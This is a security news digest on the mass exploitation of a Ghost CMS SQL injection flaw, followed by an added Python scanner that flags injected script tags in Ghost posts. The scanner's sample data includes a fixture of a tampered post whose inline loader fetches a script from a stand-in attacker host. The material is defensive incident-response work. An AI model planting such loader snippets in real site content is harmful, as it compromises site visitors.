
CVE-2026-26980, a SQL injection vulnerability in the Ghost CMS, was patched in February and later exploited in mass attacks against unpatched Ghost instances. Unauthenticated attackers used the flaw to extract sensitive data from the Ghost database, including authentication tokens, user credentials, and website content. Threat actors obtained the targeted sites’ Admin API Key and used the Ghost Admin API to modify articles on compromised sites. The attackers injected malicious JavaScript loaders intended for ClickFix-style attacks. Qianxin observed compromised websites starting in early May and identified more than 700 affected sites, including major organizations. Many victims were personal blogs and independent sites, along with technology and specialized content sites.
"The exploited vulnerability is tracked as CVE-2026-26980 and its existence came to light in February when it was patched. Ghost is a widely used open source CMS designed specifically for blogging, newsletters, and publishing, offering built-in tools for memberships, subscriptions, and audience monetization. According to its developer, Ghost is actively used by over 100,000 websites."
"When CVE-2026-26980 was disclosed, SentinelOne warned that the vulnerability, an SQL injection flaw, can be exploited by unauthenticated attackers to extract sensitive data from the Ghost database. The security firm noted that an attacker could obtain authentication tokens, user credentials, and website content."
"Qianxin reported last week that CVE-2026-26980 has been exploited in mass attacks against unpatched Ghost instances. Threat actors leveraged the flaw to obtain the targeted sites' Admin API Key and then used the API to alter articles posted on Ghost-powered sites. Specifically, the attackers injected malicious JavaScript loaders designed for ClickFix attacks."
"Qianxin started seeing compromised websites in early May. The security firm has identified more than 700 websites compromised in the campaign, including ones belonging to major organizations such as DuckDuckGo, Harvard University, and Oxford University. An analysis showed that nearly half of the hacked websites are personal blogs and independent sites, but dozens belong to software development and tech blogs, AI, cryptocurrency, and various other types of entities."
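The compromise chain described above ends with the attacker using a stolen Admin API key to rewrite published posts so that they carry a JavaScript loader. A practical post-incident check is therefore to pull every post from your own Ghost instance and look for script tags you did not put there. The scanner below is an added example written for this page; it is not Ghost's code and not part of the SecurityWeek or Qianxin reporting. It assumes post objects shaped like the Ghost Admin API's posts JSON (a `slug`, an `html` body, and the per-post `codeinjection_head` / `codeinjection_foot` fields); the allowlisted hosts and the sample posts are constructed for illustration.

```python
"""Scan Ghost post content for injected <script> loaders.

Added example, not Ghost project code. Input is assumed to be the
list of post objects returned by the Ghost Admin API (fields "slug",
"html", "codeinjection_head", "codeinjection_foot"); in practice you
would load the JSON from GET /ghost/api/admin/posts/?formats=html.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts your site legitimately loads scripts from. Constructed example
# values for a hypothetical site; replace with your own.
TRUSTED_SCRIPT_HOSTS = {"example-blog.test", "cdn.example-blog.test"}


class ScriptCollector(HTMLParser):
    """Collect every <script> in a fragment as ("src", url) or ("inline", body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._inline = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.append(("src", src.strip()))
        else:
            self._in_script = True
            self._inline = []

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data as raw CDATA.
        if self._in_script:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.scripts.append(("inline", "".join(self._inline).strip()))


def scan_fragment(html):
    """Return the script tags found in one HTML fragment (None-safe)."""
    parser = ScriptCollector()
    parser.feed(html or "")
    parser.close()
    return parser.scripts


def scan_posts(posts, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """Flag external scripts from unknown hosts and every inline script.

    Relative src values (no scheme, no host) are treated as same-origin.
    Protocol-relative (//host/x.js), data: and javascript: sources are
    all reported, since those are the shapes a loader typically takes.
    """
    findings = []
    for post in posts:
        for field in ("html", "codeinjection_head", "codeinjection_foot"):
            for kind, value in scan_fragment(post.get(field)):
                if kind == "src":
                    parsed = urlparse(value)
                    if parsed.scheme == "" and parsed.hostname is None:
                        continue  # relative path, served by the site itself
                    if parsed.hostname in trusted_hosts:
                        continue
                    findings.append({"slug": post["slug"], "field": field,
                                     "kind": "external", "detail": value})
                else:
                    findings.append({"slug": post["slug"], "field": field,
                                     "kind": "inline", "detail": value[:80]})
    return findings


# Constructed sample posts: one clean, one carrying an injected loader in
# the body and a second-stage fetcher in the post footer injection slot.
SAMPLE_POSTS = [
    {"slug": "hello-world",
     "html": '<p>Welcome.</p><script src="https://cdn.example-blog.test/prism.js"></script>'},
    {"slug": "tampered",
     "html": '<p>Normal text.</p><script src="//static.attacker-loader.test/l.js"></script>',
     "codeinjection_foot": "<script>var s=document.createElement('script');"
                           "s.src='https://attacker-loader.test/c.js';document.body.appendChild(s)</script>"},
]

if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS):
        print(f"{f['slug']}: {f['kind']} script in {f['field']}: {f['detail']}")
```

Run it against a dump of your posts and review every hit; a post that legitimately embeds a third-party widget will show up too, so extend `TRUSTED_SCRIPT_HOSTS` rather than suppressing the inline check, since inline loaders that build a `script` element at runtime are exactly what a host allowlist alone would miss. Rotating the Admin API key and staff credentials still has to happen alongside cleanup, because the scanner only finds what was already written into content.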
Read at SecurityWeek